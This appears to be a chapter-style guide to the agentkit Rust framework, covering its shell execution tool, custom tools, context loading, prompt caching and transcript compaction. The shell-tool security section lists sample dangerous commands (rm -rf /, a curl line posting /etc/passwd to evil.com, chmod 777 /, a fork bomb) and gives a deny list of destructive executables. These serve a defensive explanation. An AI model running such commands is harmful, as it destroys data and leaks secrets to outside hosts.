Input schema

Field	Type	Required	Description
`executable`	`string`	yes	Program to run
`argv`	`[string]`	no	Command-line arguments
`cwd`	`string`	no	Working directory
`env`	`{string: string}`	no	Environment variables
`timeout_ms`	`integer`	no	Timeout in milliseconds

Output

The tool returns structured JSON:

{
  "stdout": "...",
  "stderr": "...",
  "success": true,
  "exit_code": 0
}

Both stdout and stderr are captured. The model sees the full output and can reason about errors.

Permission preflight

Before spawning a process, the tool emits a ShellPermissionRequest:

#![allow(unused)]
fn main() {
pub struct ShellPermissionRequest {
    pub executable: String,
    pub argv: Vec<String>,
    pub cwd: Option<PathBuf>,
    pub env_keys: Vec<String>,
    pub metadata: MetadataMap,
}
}

Note that only environment keys are included, not values. Policy usually doesn’t need the full environment — knowing that AWS_SECRET_ACCESS_KEY is being passed is enough to flag the command.

CommandPolicy evaluates these requests:

#![allow(unused)]
fn main() {
let policy = CommandPolicy::new()
    .allow_executables(["ls", "cat", "git", "cargo"])
    .deny_executables(["rm", "dd", "mkfs"])
    .require_approval_for_unknown(true);
}

Cancellation

ShellExecTool respects TurnCancellation from the tool context. If the user presses Ctrl-C during a long-running command, the tool kills the subprocess and returns a cancellation result.

The implementation uses tokio::select! to race the subprocess against the cancellation future:

#![allow(unused)]
fn main() {
tokio::select! {
    result = child.wait_with_output() => { /* normal completion */ }
    _ = cancellation.cancelled() => { /* kill the child */ }
}
}

Timeouts

Per-invocation timeouts are supported through the timeout_ms input field. If the command exceeds the timeout, it’s killed and an error result is returned. This is independent of cancellation — timeouts are tool-scoped, cancellation is turn-scoped.

The shell tool in the agent loop

Shell execution is where the agent loop interacts most visibly with the outside world. A typical coding agent session involves dozens of shell commands: cargo build, cargo test, git diff, ls, grep. The integration with the task manager determines how these commands affect the loop:

Sequential (SimpleTaskManager):

  Model: ToolCall(shell_exec, { executable: "cargo", argv: ["build"] })
  Driver: execute inline, wait for completion (10 seconds)
  Driver: append result to transcript
  Driver: start next model turn


With ForegroundThenDetachAfter(5s):

  Model: ToolCall(shell_exec, { executable: "cargo", argv: ["build"] })
  Driver: start executing, wait up to 5 seconds
  └── if finishes in 3s → result appended, loop continues normally
  └── if still running at 5s → detach to background
      └── model receives a synthetic tool result: "task is running in the background"
      └── model continues its turn (e.g. reads another file)
      └── when build finishes, result appears in next turn

This integration is covered in detail in Chapter 18.

Security considerations

Shell execution is inherently dangerous. agentkit provides the policy tools to constrain it, but the host application is responsible for configuring appropriate policies.

The threat model

An LLM with shell access can:

Delete files (rm -rf /)
Exfiltrate data (curl -d @/etc/passwd https://evil.com)
Install software (pip install malware)
Modify system state (chmod 777 /)
Consume resources (fork bomb, dd if=/dev/zero)

These aren’t hypothetical — models will occasionally generate dangerous commands, especially when frustrated by errors or prompted adversarially.

Defence layers

Layer 1: Policy (prevent)
  CommandPolicy with allowlists and denylists
  Require approval for unknown commands

Layer 2: Timeout (contain)
  Per-invocation timeouts kill runaway commands
  Task manager detach prevents blocking

Layer 3: Sandbox (isolate)
  Run the agent in a container, VM, or restricted user
  Mount the workspace read-write, everything else read-only

Layer 4: Audit (detect)
  LoopObserver logs every shell command and its output
  Review logs for unexpected behaviour

Guidelines

Always pair ShellExecTool with a CommandPolicy
Use executable allowlists rather than denylists when possible — it’s easier to enumerate safe commands than to enumerate all dangerous ones
Consider running the agent in a sandboxed environment for untrusted inputs
Use require_approval_for_unknown(true) as a sensible default
Set reasonable timeouts — a build command that takes 10 minutes is probably stuck
Only expose the env_keys that tools actually need — don’t pass through AWS_SECRET_ACCESS_KEY unless required

Example: openrouter-parallel-agent uses shell tools with ForegroundThenDetachAfter routing — commands that take too long are automatically promoted to background tasks.

Crate: agentkit-tool-shell — depends on agentkit-tools-core, agentkit-core, and tokio.

Writing custom tools

Custom tools are the primary extension mechanism in agentkit. This chapter shows how to implement tools from simple to sophisticated, including preflight actions, custom permission types, and shared resources.

Happy path: `#[tool]` macro

For a stateless tool whose input is a serializable struct, the #[tool] attribute from agentkit-tools-derive generates the entire Tool impl from one async function:

use agentkit_core::{MetadataMap, ToolOutput, ToolResultPart};
use agentkit_tools_core::{ToolError, ToolRegistry, ToolResult};
use agentkit_tools_derive::tool;
use schemars::JsonSchema;
use serde::Deserialize;

#[derive(JsonSchema, Deserialize)]
struct WordCountInput {
    /// The text whose words should be counted.
    text: String,
}

/// Count the number of whitespace-separated words in a string.
#[tool]
async fn word_count(input: WordCountInput) -> Result<ToolResult, ToolError> {
    let count = input.text.split_whitespace().count();
    Ok(ToolResult {
        result: ToolResultPart {
            call_id: Default::default(),
            output: ToolOutput::Text(format!("{count} word(s)")),
            is_error: false,
            metadata: MetadataMap::new(),
        },
        duration: None,
        metadata: MetadataMap::new(),
    })
}

let registry = ToolRegistry::new().with(word_count);

What the macro generates:

A unit struct named the same as the function (word_count), implementing Tool. Registering reads as registry.with(word_count).
A ToolSpec whose input_schema is derived from the input type via schemars::JsonSchema. The schema is built once at first access and cached in a OnceLock.
name defaults to the function’s identifier; override with #[tool(name = "explicit_name")].
description defaults to the function’s first doc comment line; override with #[tool(description = "...")].
invoke decodes request.input into the input type using serde_json and calls the user body. Decode errors become ToolError::InvalidInput, which the loop surfaces as an error ToolResult so the model can correct itself on the next turn.

Requirements for the input type:

Implements schemars::JsonSchema (for the input_schema field).
Implements serde::Deserialize (for decoding request.input).

Requirements for the function:

async fn, with an explicit return type of Result<ToolResult, ToolError> (or any compatible alias).
Exactly one positional argument: the input struct. The argument name becomes a local binding inside the generated invoke body. ToolContext is not threaded into the macro shape — if your tool needs it, use the manual impl below.

Enable the macro by adding the two crates to your Cargo.toml:

[dependencies]
agentkit-tools-core = { version = "...", features = ["schemars"] }
agentkit-tools-derive = "..."
schemars = { version = "1", features = ["derive"] }
serde = { version = "1", features = ["derive"] }

The companion runnable example lives at examples/openrouter-macro-tool/.

For tools that need access to ToolContext, hold per-instance state, propose preflight permission requests, or surface custom permission kinds, drop down to the manual impl Tool path described in the rest of this chapter.

A minimal tool

#![allow(unused)]
fn main() {
use agentkit_tools_core::*;
use agentkit_core::*;
use async_trait::async_trait;
use serde_json::json;

pub struct EchoTool {
    spec: ToolSpec,
}

impl EchoTool {
    pub fn new() -> Self {
        Self {
            spec: ToolSpec {
                name: ToolName::new("echo"),
                description: "Return the input unchanged".into(),
                input_schema: json!({
                    "type": "object",
                    "properties": {
                        "message": { "type": "string" }
                    },
                    "required": ["message"]
                }),
                annotations: ToolAnnotations {
                    read_only_hint: true,
                    ..Default::default()
                },
                metadata: MetadataMap::new(),
            },
        }
    }
}

#[async_trait]
impl Tool for EchoTool {
    fn spec(&self) -> &ToolSpec {
        &self.spec
    }

    async fn invoke(
        &self,
        request: ToolRequest,
        _ctx: &mut ToolContext<'_>,
    ) -> Result<ToolResult, ToolError> {
        let message = request.input["message"]
            .as_str()
            .ok_or_else(|| ToolError::InvalidInput("missing message".into()))?;

        Ok(ToolResult {
            result: ToolResultPart {
                call_id: request.call_id,
                output: ToolOutput::Text(message.to_string()),
                is_error: false,
                metadata: MetadataMap::new(),
            },
            duration: None,
            metadata: MetadataMap::new(),
        })
    }
}
}

#![allow(unused)]
fn main() {
let registry = ToolRegistry::new().with(EchoTool::new());
}

Using ToolContext

Tools receive a ToolContext that provides access to the current session, permissions, cancellation state, and shared resources:

#![allow(unused)]
fn main() {
async fn invoke(&self, request: ToolRequest, ctx: &mut ToolContext<'_>) -> Result<ToolResult, ToolError> {
    // Check cancellation
    if let Some(ref cancel) = ctx.cancellation {
        if cancel.is_cancelled() {
            return Err(ToolError::Cancelled);
        }
    }

    // Access shared resources
    let resources = ctx.resources;

    // Access session identity
    let session_id = ctx.capability.session_id;

    // Detect that the loop is resuming this call after a host approval
    if let Some(approval) = ctx.approved_request.as_ref() {
        // resume side of the work
    }

    // Invoke another tool through the same executor + permissions
    if let Some(scope) = ctx.execution_scope.clone() {
        let outcome = scope.execute_child(child_request).await;
    }

    // ...
}
}

execution_scope is the supported entry point for tools that compose other tools (see agentkit-tool-compose and the Composing other tools section below). approved_request is Some only while the loop is resuming this call past a host approval; the executor restores the previous value on return.

Adding preflight permission requests

For tools with side effects, override proposed_requests on the Tool trait to expose proposed actions before execution:

#![allow(unused)]
fn main() {
impl Tool for DeployTool {
    fn spec(&self) -> &ToolSpec { &self.spec }

    fn proposed_requests(
        &self,
        request: &ToolRequest,
    ) -> Result<Vec<Box<dyn PermissionRequest>>, ToolError> {
        let env = request.input["environment"].as_str().unwrap_or("unknown");
        Ok(vec![Box::new(DeployPermissionRequest {
            environment: env.to_string(),
            service: "my-service".into(),
            metadata: MetadataMap::new(),
        })])
    }

    async fn invoke(&self, request: ToolRequest, ctx: &mut ToolContext<'_>)
        -> Result<ToolResult, ToolError> { /* ... */ }
}
}

The executor evaluates these before calling invoke(). If any are denied or require approval, execution stops before any side effects occur.

Custom permission requests

Define your own permission request types:

#![allow(unused)]
fn main() {
pub struct DeployPermissionRequest {
    pub environment: String,
    pub service: String,
    pub metadata: MetadataMap,
}

impl PermissionRequest for DeployPermissionRequest {
    fn kind(&self) -> &'static str { "myapp.deploy" }
    fn summary(&self) -> String {
        format!("Deploy {} to {}", self.service, self.environment)
    }
    fn metadata(&self) -> &MetadataMap { &self.metadata }
    fn as_any(&self) -> &dyn Any { self }
}
}

Host policies can match on kind() generically, or downcast through as_any() for type-safe field access.

Shared resources via ToolResources

If your tool needs session-scoped state (like the filesystem tools’ read-before-write tracker), implement ToolResources:

#![allow(unused)]
fn main() {
pub trait ToolResources: Send + Sync {
    fn as_any(&self) -> &dyn Any;
}
}

Tool composition patterns

Nesting agents as tools

A powerful pattern: implement a tool that runs a nested agent loop. The outer agent calls the tool with a task description, the tool starts an inner agent, runs it to completion, and returns the result.

Outer agent (orchestrator):
  Model: "I need to research this codebase and write a report"
  Model: ToolCall(subagent, { task: "Find all uses of unsafe code", tools: ["fs", "shell"] })
         │
         ▼
  Inner agent (researcher):
    Model: ToolCall(fs_read_file, { path: "src/lib.rs" })
    Model: ToolCall(shell_exec, { executable: "grep", argv: ["-r", "unsafe", "src/"] })
    Model: "Found 3 uses of unsafe in parser.rs, codec.rs, and ffi.rs..."
         │
         ▼
  Outer agent receives: "Found 3 uses of unsafe..."
  Model: "Based on my research, here's the report..."

The inner agent has its own transcript, tools, and session. It doesn’t share state with the outer agent — this isolation prevents context pollution and makes the sub-agent’s scope explicit.

The openrouter-subagent-tool example shows a complete implementation of this pattern.

Composing other tools

When a tool needs to invoke other tools — not a nested agent loop, just direct calls — go through ctx.execution_scope rather than holding a reference to the registry or executor yourself. The scope routes nested calls through the same ToolExecutor, permission checks, output truncation, and cancellation token as the parent call.

#![allow(unused)]
fn main() {
async fn invoke_outcome(
    &self,
    request: ToolRequest,
    ctx: &mut ToolContext<'_>,
) -> ToolExecutionOutcome {
    let scope = match ctx.execution_scope.clone() {
        Some(scope) => scope,
        None => return ToolExecutionOutcome::Failed(
            ToolError::Internal("missing execution scope".into()),
        ),
    };

    let child = ToolRequest::new(/* ... */);
    match scope.execute_child(child).await {
        ToolExecutionOutcome::Completed(result) => /* ... */,
        // Propagate child approval interrupts back to the loop.
        ToolExecutionOutcome::Interrupted(i) => ToolExecutionOutcome::Interrupted(i),
        ToolExecutionOutcome::Failed(e) => ToolExecutionOutcome::Failed(e),
    }
}
}

Override invoke_outcome (not just invoke) so a child tool’s ApprovalRequired interruption travels back to the loop and the host can decide. After approval, the loop replays your tool with ctx.approved_request = Some(...) set — use scope.execute_approved_child(request, approval) to advance the specific child call past the recorded approval.

The agentkit-tool-compose crate is the canonical example: it exposes a compose tool that runs sandboxed Lua scripts, and each tool(name, input) call inside the script becomes one scope.execute_child(...) round.

Tool registries from crates

Organize related tools into crate-level registry() functions:

#![allow(unused)]
fn main() {
pub fn registry() -> ToolRegistry {
    ToolRegistry::new()
        .with(ToolA::default())
        .with(ToolB::default())
}
}

Host applications merge registries from multiple crates:

#![allow(unused)]
fn main() {
let registry = my_tools::registry()
    .merge(agentkit_tool_fs::registry())
    .merge(agentkit_tool_shell::registry());
}

Stateful tools

Tools that need to maintain state across invocations (counters, caches, connection pools) should use ToolResources:

#![allow(unused)]
fn main() {
struct MyToolResources {
    cache: Mutex<HashMap<String, String>>,
    http_client: reqwest::Client,
}

impl ToolResources for MyToolResources {
    fn as_any(&self) -> &dyn Any { self }
}

// In your tool's invoke():
let resources = ctx.resources
    .as_any()
    .downcast_ref::<MyToolResources>()
    .expect("MyToolResources not registered");

let mut cache = resources.cache.lock().unwrap();
}

#![allow(unused)]
fn main() {
let agent = Agent::builder()
    .model(adapter)
    .resources(MyToolResources::new())
    .build()?;
}

All tools in the session share the same ToolResources instance. This is how the filesystem tools share their read-before-write tracker — FileSystemToolResources implements ToolResources and is downcast in each tool’s invoke().

Example: openrouter-subagent-tool implements a custom tool that runs a nested agent as a tool call.

Crate: agentkit-tools-core — Tool, ToolRegistry, ToolResources, ToolContext.

Context loading

A coding agent needs to understand the project it’s working in. This chapter covers agentkit-context: how agents load project instructions, conventions, and ambient context into the transcript.

The problem

Without context, a coding agent is generic. It doesn’t know your project’s conventions, tech stack, or constraints. It will write Python-style Rust, ignore your linting rules, and miss architectural patterns that are obvious to anyone who has read the README.

Context loading bridges this gap by injecting project-specific information into the transcript before the model sees it:

Without context:

  Transcript: [System("You are a coding assistant"), User("Fix the parser")]
  Model: writes code that doesn't match project conventions


With context:

  Transcript: [
      System("You are a coding assistant"),
      Context("This project uses Rust 2024 edition. Error handling uses thiserror..."),
      Context("All public types must have doc comments. Use `cargo clippy` before committing."),
      User("Fix the parser"),
  ]
  Model: writes idiomatic code that follows project conventions

Once system prompts and context items are stable, they form a reusable prefix for every turn. The next chapter covers prompt caching — the transport optimization that exploits this stability.

ContextLoader

The loader combines multiple context sources and produces Vec<Item> with ItemKind::Context:

#![allow(unused)]
fn main() {
let items = ContextLoader::new()
    .with_source(AgentsMd::discover_all(workspace_root))
    .with_source(my_custom_source)
    .load()
    .await?;
}

Sources are loaded in registration order and their results are concatenated. The resulting items are ordinary transcript entries — the loop and providers don’t need a separate context path. They’re preloaded via AgentBuilder::transcript alongside the system items, and the first user message is preloaded via AgentBuilder::input:

#![allow(unused)]
fn main() {
let mut transcript = Vec::new();
transcript.extend(system_items);
transcript.extend(context_items); // ← loaded by ContextLoader

let agent = Agent::builder()
    .model(adapter)
    .transcript(transcript)
    .input(user_items)
    .build()?;

let mut driver = agent.start(session_config).await?;
}

AgentsMd

The primary built-in source loads AGENTS.md files (similar to how Claude Code uses CLAUDE.md or Cursor uses .cursorrules):

#![allow(unused)]
fn main() {
// Find the nearest AGENTS.md by walking up from the workspace
let source = AgentsMd::discover(workspace_root);

// Find all AGENTS.md files from root to workspace (stacked)
let source = AgentsMd::discover_all(workspace_root);
}

Discovery modes

AgentsMdMode::Nearest — stop at the first match:

  /home/user/projects/myapp/AGENTS.md     ← found, stop
  /home/user/projects/AGENTS.md           (not checked)
  /home/user/AGENTS.md                    (not checked)


AgentsMdMode::All — collect everything, outermost first:

  /home/user/AGENTS.md                    ← loaded first (general)
  /home/user/projects/AGENTS.md           ← loaded second (more specific)
  /home/user/projects/myapp/AGENTS.md     ← loaded last (most specific)

The All mode is useful for organizations that layer context: a company-wide AGENTS.md at a parent directory, project-level instructions at the repo root, and module-specific instructions in subdirectories. More specific instructions appear later in the transcript and take precedence in the model’s attention.

Configuration

#![allow(unused)]
fn main() {
let source = AgentsMd::discover_all(workspace_root)
    .with_file_name("CLAUDE.md")            // Custom file name
    .with_search_dir(".agent/")             // Check sidecar directories
    .with_path("/team/shared/AGENTS.md");   // Explicit file path
}

Method	What it does
`with_file_name`	Change from `AGENTS.md` to a different name
`with_search_dir`	Check a specific directory (no ancestor walk)
`with_path`	Include an explicit file path (skipped if missing)

Explicit paths and search dirs are checked before ancestor discovery. All results are deduplicated by path.

Loaded item structure

Each loaded file becomes an Item with metadata:

#![allow(unused)]
fn main() {
Item {
    kind: ItemKind::Context,
    parts: [Part::Text(TextPart {
        text: "[Loaded AGENTS]\nPath: /workspace/AGENTS.md\n\n<file contents>",
        ...
    })],
    metadata: {
        "agentkit.context.source": "agents_md",
        "agentkit.context.path": "/workspace/AGENTS.md",
    },
}
}

The metadata lets compaction strategies and reporters identify where context came from. The source key distinguishes AgentsMd items from other context sources.

The `ContextSource` trait

All context loading goes through a simple trait:

#![allow(unused)]
fn main() {
#[async_trait]
pub trait ContextSource: Send + Sync {
    async fn load(&self) -> Result<Vec<Item>, ContextError>;
}
}

AgentsMd implements this trait. Custom sources implement it to load context from any source.

Context vs System items

ItemKind::Context is distinct from ItemKind::System because they serve different purposes:

	`ItemKind::System`	`ItemKind::Context`
Example	“You are a coding assistant”	“This project uses Rust 2024 edition”
Origin	Hardcoded by the application	Loaded from project files
Scope	Same across all projects	Different per project
Mutability	Never changes during a session	May be refreshed on context reload
Compaction	Preserved during compaction	May be summarized or refreshed

This distinction matters for compaction:

System items are always preserved — they define the agent’s identity
Context items might be refreshed (reload from disk) or summarized during compaction

Writing custom context sources

The ContextSource trait is simple enough that custom sources are straightforward:

#![allow(unused)]
fn main() {
struct GitBranchContext;

#[async_trait]
impl ContextSource for GitBranchContext {
    async fn load(&self) -> Result<Vec<Item>, ContextError> {
        let output = tokio::process::Command::new("git")
            .args(["branch", "--show-current"])
            .output()
            .await
            .map_err(|e| ContextError::ReadFailed {
                path: PathBuf::from(".git"),
                error: e,
            })?;

        let branch = String::from_utf8_lossy(&output.stdout).trim().to_string();
        Ok(vec![Item {
            id: None,
            kind: ItemKind::Context,
            parts: vec![Part::Text(TextPart {
                text: format!("Current git branch: {branch}"),
                metadata: MetadataMap::new(),
            })],
            metadata: MetadataMap::new(),
        }])
    }
}
}

#![allow(unused)]
fn main() {
let items = ContextLoader::new()
    .with_source(AgentsMd::discover_all(workspace_root))
    .with_source(GitBranchContext)
    .load()
    .await?;
}

Other useful custom sources:

Load dependency versions from Cargo.toml or package.json
Load CI configuration summaries
Load recent git log entries
Load MCP resources (via ResourceProvider)
Load team-specific conventions from a shared server

Example: openrouter-context-agent demonstrates context loading from AGENTS.md and skills directories.

Crate: agentkit-context — depends on agentkit-core and async-fs for filesystem operations.

Prompt caching

Prompt caching reduces cost and latency by reusing stable prefixes of a turn request. This chapter covers the cache model in agentkit-loop: what the host configures, what the loop passes to providers, and how adapters translate that into provider-specific behavior.

Why caching lives at the request level

Caching is a transport optimization, not transcript semantics. The transcript is the conversation itself: system prompts, user messages, tool calls, tool results, and context items. Caching is applied when a turn is sent to a provider.

That distinction is why agentkit models caching on SessionConfig and TurnRequest, not on Item or Part.

#![allow(unused)]
fn main() {
pub struct SessionConfig {
    pub session_id: SessionId,
    pub metadata: MetadataMap,
    pub cache: Option<PromptCacheRequest>,
}

pub struct TurnRequest {
    pub session_id: SessionId,
    pub turn_id: TurnId,
    pub transcript: Vec<Item>,
    pub available_tools: Vec<ToolSpec>,
    pub metadata: MetadataMap,
    pub cache: Option<PromptCacheRequest>,
}
}

The host sets a session-level default. The loop copies that into each TurnRequest unless the host overrides the next turn explicitly.

The cache request shape

The request is provider-neutral:

#![allow(unused)]
fn main() {
pub enum PromptCacheMode {
    Disabled,
    BestEffort,
    Required,
}

pub enum PromptCacheRetention {
    Default,
    Short,
    Extended,
}

pub enum PromptCacheStrategy {
    Automatic,
    Explicit {
        breakpoints: Vec<PromptCacheBreakpoint>,
    },
}

pub enum PromptCacheBreakpoint {
    ToolsEnd,
    TranscriptItemEnd { index: usize },
    TranscriptPartEnd { item_index: usize, part_index: usize },
}

pub struct PromptCacheRequest {
    pub mode: PromptCacheMode,
    pub strategy: PromptCacheStrategy,
    pub retention: Option<PromptCacheRetention>,
    pub key: Option<String>,
}
}

Field semantics

Field	Variant	Meaning
`mode`	`Disabled`	Do not send cache hints for this turn
	`BestEffort`	Use caching if the provider supports it; degrade silently otherwise
	`Required`	Fail the turn if the cache request cannot be honored
`strategy`	`Automatic`	Let the adapter use native provider behavior, or emulate it internally
	`Explicit`	The host specifies concrete cache boundaries
`retention`		Provider-neutral hint for short-lived vs extended retention
`key`		Optional stable cache key for providers that support one

Session defaults

The simplest place to configure caching is the session:

#![allow(unused)]
fn main() {
let mut driver = agent
    .start(SessionConfig {
        session_id: SessionId::new("coding-agent"),
        metadata: MetadataMap::new(),
        cache: Some(PromptCacheRequest {
            mode: PromptCacheMode::BestEffort,
            strategy: PromptCacheStrategy::Automatic,
            retention: Some(PromptCacheRetention::Short),
            key: None,
        }),
    })
    .await?;
}

This says:

try to use prompt caching
let the provider or adapter choose the prefix automatically
prefer short-lived retention
do not require a user-supplied cache key

`None` vs `Disabled`

These have different semantics:

Value	Meaning
`cache: None`	No cache preference — adapters don’t add cache fields; provider-native automatic caching may still happen
`cache: Some(... { mode: Disabled, .. })`	Explicitly disable cache controls from agentkit for this session or turn

Automatic strategy

PromptCacheStrategy::Automatic is the recommended default for most applications:

#![allow(unused)]
fn main() {
PromptCacheRequest {
    mode: PromptCacheMode::BestEffort,
    strategy: PromptCacheStrategy::Automatic,
    retention: Some(PromptCacheRetention::Short),
    key: None,
}
}

Why this is the default shape:

it keeps the host provider-agnostic
OpenAI-style providers can use native automatic caching
Anthropic-style providers can be supported by adapters that synthesize explicit cache headers internally
unsupported providers degrade cleanly in BestEffort mode

In other words: the host chooses the policy, not the provider-specific mechanism.

Explicit strategy

When the host knows the desired boundaries, it can specify them directly:

#![allow(unused)]
fn main() {
let cache = PromptCacheRequest {
    mode: PromptCacheMode::BestEffort,
    strategy: PromptCacheStrategy::Explicit {
        breakpoints: vec![
            PromptCacheBreakpoint::ToolsEnd,
            PromptCacheBreakpoint::TranscriptItemEnd { index: 3 },
        ],
    },
    retention: Some(PromptCacheRetention::Short),
    key: Some("workspace:agentkit".into()),
};
}

Breakpoints are expressed in request order:

tools
transcript items
transcript parts within an item

This matters for providers that expose explicit cache boundaries on tools or message blocks.

Per-turn overrides

Session defaults are often enough, but the loop also supports per-turn overrides:

#![allow(unused)]
fn main() {
driver.set_next_turn_cache(
    PromptCacheRequest::explicit_required([PromptCacheBreakpoint::tools_end()])
        .with_retention(PromptCacheRetention::Extended)
        .with_key("release-planning"),
)?;

// then submit the user message via the next cooperative interrupt:
input_request.submit(&mut driver, vec![user_item])?;
}

The override applies to the next model turn only. Later turns fall back to the session default. The set_next_turn_cache call is independent of input submission, so it composes with whichever InputRequest / ToolRoundInfo handle is in scope.

How adapters use it

The loop does not interpret cache semantics itself. It passes the normalized request through to the adapter.

For completions-style providers, the mapping hook is:

#![allow(unused)]
fn main() {
fn apply_prompt_cache(
    &self,
    body: &mut serde_json::Map<String, Value>,
    request: &TurnRequest,
) -> Result<(), LoopError>;
}

That gives adapters three implementation choices:

use native automatic caching controls
synthesize explicit cache headers or request fields from the normalized request
ignore unsupported cache requests in BestEffort mode, or error in Required mode

This is the architectural boundary: agentkit keeps the host-facing API stable while each provider adapter chooses the correct wire format.

Reporting cache usage

Providers can report cache reads and writes through normalized usage fields:

#![allow(unused)]
fn main() {
pub struct TokenUsage {
    pub input_tokens: u64,
    pub output_tokens: u64,
    pub reasoning_tokens: Option<u64>,
    pub cached_input_tokens: Option<u64>,
    pub cache_write_input_tokens: Option<u64>,
}
}

cached_input_tokens
- input tokens served from cache
cache_write_input_tokens
- input tokens written into cache on this request

This makes caching visible to reporters and host-side cost accounting without exposing provider-specific response formats.

Practical recommendation

For most hosts, start here:

#![allow(unused)]
fn main() {
SessionConfig {
    session_id: SessionId::new("demo"),
    metadata: MetadataMap::new(),
    cache: Some(PromptCacheRequest {
        mode: PromptCacheMode::BestEffort,
        strategy: PromptCacheStrategy::Automatic,
        retention: Some(PromptCacheRetention::Short),
        key: None,
    }),
}
}

Then reach for explicit breakpoints only when you need to control exact cache boundaries.

Crate: Prompt caching types live in agentkit-core. Session and turn-level cache handling is in agentkit-loop. Provider-specific cache mapping is in each agentkit-provider-* crate.

Transcript compaction

Long conversations exceed context windows. Compaction is how you keep an agent session viable without losing important context. This chapter covers agentkit-compaction: the trigger, strategy, and pipeline system.

The design

Compaction is optional and host-configured. It plugs into the loop through the generic LoopMutator seam — a Compactor is just a mutator that decides “should I rewrite the transcript right now?” and, if yes, swaps it out. There are three concerns:

When to compact — the trigger closure
How to compact — the strategy (or pipeline of strategies)
What to use for semantic summarization — the optional backend

#![allow(unused)]
fn main() {
let compactor = StrategyCompactor::builder()
    .item_count_trigger(12)
    .strategy(strategy)
    .build()?;

let agent = Agent::builder()
    .model(adapter)
    .compactor(compactor) // AgentBuilderCompactorExt
    .build()?;
}

Triggers

A trigger is a closure with the shape Fn(&[Item], MutationPoint) -> Option<CompactionReason> + Send + Sync (aliased as TriggerFn). Returning Some(reason) fires compaction; None skips. Built-in helpers:

item_count_trigger(max_items) — fires when the transcript grows beyond max_items
context_window_trigger(window, percent) — fires when the latest item’s reported input_tokens reaches window * percent / 100 (only at AfterTurnEnded)

Custom triggers are plain closures:

#![allow(unused)]
fn main() {
StrategyCompactor::builder()
    .trigger(Box::new(|transcript, point| {
        (point == MutationPoint::AfterTurnEnded && transcript.len() > 20)
            .then_some(CompactionReason::TranscriptTooLong)
    }))
    .strategy(strategy)
    .build()?;
}

Strategies

A CompactionStrategy transforms the transcript:

#![allow(unused)]
fn main() {
pub trait CompactionStrategy {
    async fn compact(
        &self,
        request: CompactionRequest,
        ctx: &mut CompactionContext,
    ) -> Result<CompactionResult, CompactionError>;
}
}

Built-in strategies:

Strategy	Description
`DropReasoningStrategy`	Removes reasoning parts from assistant items
`DropFailedToolResultsStrategy`	Removes tool results where `is_error: true`
`KeepRecentStrategy`	Keeps the last N non-preserved items
`SummarizeOlderStrategy`	Summarizes older items through the backend

Preservation

KeepRecentStrategy supports preservation rules:

#![allow(unused)]
fn main() {
KeepRecentStrategy::new(8)
    .preserve_kind(ItemKind::System)
    .preserve_kind(ItemKind::Context)
}

System and context items are kept regardless of age. Only user/assistant/tool items are subject to trimming.

Pipelines

Multiple strategies compose into a pipeline:

#![allow(unused)]
fn main() {
CompactionPipeline::new()
    .with_strategy(DropReasoningStrategy::new())
    .with_strategy(DropFailedToolResultsStrategy::new())
    .with_strategy(KeepRecentStrategy::new(8)
        .preserve_kind(ItemKind::System)
        .preserve_kind(ItemKind::Context))
}

Strategies execute in order. Each one receives the output of the previous.

Semantic compaction

For summarization, the host injects a CompactionBackend:

#![allow(unused)]
fn main() {
let compactor = StrategyCompactor::builder()
    .trigger(trigger)
    .strategy(strategy) // e.g. SummarizeOlderStrategy
    .backend(my_backend)
    .build()?;
}

The backend receives a SummaryRequest and returns a SummaryResult. agentkit ships AgentCompactor, a backend that runs a nested loop over a sub-agent (use it directly or roll your own). The openrouter-compaction-agent example wires AgentCompactor into the pipeline.

A compaction example

Before and after a compaction pipeline run:

Before (20 items, trigger threshold: 12):

  [0]  System: "You are a coding assistant"           ← preserved
  [1]  Context: "Project uses Rust 2024..."            ← preserved
  [2]  User: "What files are in src/?"
  [3]  Asst: (reasoning) "Let me list the directory"
             (text) "I'll check..."
             (tool_call) fs_list_directory
  [4]  Tool: ["main.rs", "lib.rs", "parser.rs"]
  [5]  Asst: "There are three files..."
  [6]  User: "Read parser.rs"
  [7]  Asst: (tool_call) fs_read_file
  [8]  Tool: "fn parse() { ... }"
  [9]  Asst: "The parser contains..."
  [10] User: "Add error handling"
  [11] Asst: (tool_call) fs_replace_in_file
  [12] Tool: { is_error: true, "search text not found" }  ← failed
  [13] Asst: "Let me try again..."
             (tool_call) fs_replace_in_file
  [14] Tool: "Replacement successful"
  [15] Asst: (tool_call) shell_exec("cargo check")
  [16] Tool: "Compiling... 0 errors"
  [17] Asst: "Done! I added error handling..."
  [18] User: "Now add tests"
  [19] Asst: (thinking about tests...)


Pipeline:
  1. DropReasoningStrategy     → removes reasoning parts from [3], [19]
  2. DropFailedToolResultsStrategy → removes failed result [12]
  3. KeepRecentStrategy(8, preserve System+Context)

After (10 items):

  [0]  System: "You are a coding assistant"            ← preserved
  [1]  Context: "Project uses Rust 2024..."             ← preserved
  [2]  Asst: "Let me try again..."                      ← recent 8 start here
             (tool_call) fs_replace_in_file
  [3]  Tool: "Replacement successful"
  [4]  Asst: (tool_call) shell_exec("cargo check")
  [5]  Tool: "Compiling... 0 errors"
  [6]  Asst: "Done! I added error handling..."
  [7]  User: "Now add tests"
  [8]  Asst: (now without reasoning part)

The model lost the early conversation but retains the system prompt, project context, and the most recent work. This is usually a good trade-off — the model’s attention is strongest on recent items anyway.

Compaction vs prompt caching

Compaction and prompt caching both operate on the turn request, but they optimize for different things:

Prompt caching tries to reuse an unchanged serialized prefix from earlier turns
Compaction deliberately changes the serialized transcript to make it shorter

That means compaction often invalidates the cache prefix even when the conversation is still logically continuous.

Consider the actual prompt prefix sent to the provider:

Before compaction:

  [system]
  [context]
  [user 1]
  [assistant 1]
  [tool result 1]
  [user 2]
  [assistant 2]
  [user 3]

  cacheable prefix for turn N:
  └───────────────────────────────────────────────┘


After compaction:

  [system]                       ← still present
  [context]                      ← still present
  [compaction summary]           ← new item, replaces older history
  [assistant 2]
  [user 3]

  new cacheable prefix for turn N+1:
  └─────────────────────────────┘

Provider-side caches are keyed on the exact prompt prefix, not the semantic meaning of the conversation. These changes all tend to invalidate an existing cache entry:

dropping reasoning parts
removing failed tool results
trimming old user/assistant/tool items
replacing many old items with a single summary item
reordering or refreshing context items

What survives compaction

After compaction, only the compacted transcript is part of future conversation history from the model’s perspective.

Retained	Dropped
Preserved `System` items	Reasoning blocks
Preserved `Context` items	Failed tool results
Recent user/assistant/tool items that survived	Older conversation items past the keep window
Summary items from semantic compaction	Raw items replaced by a summary

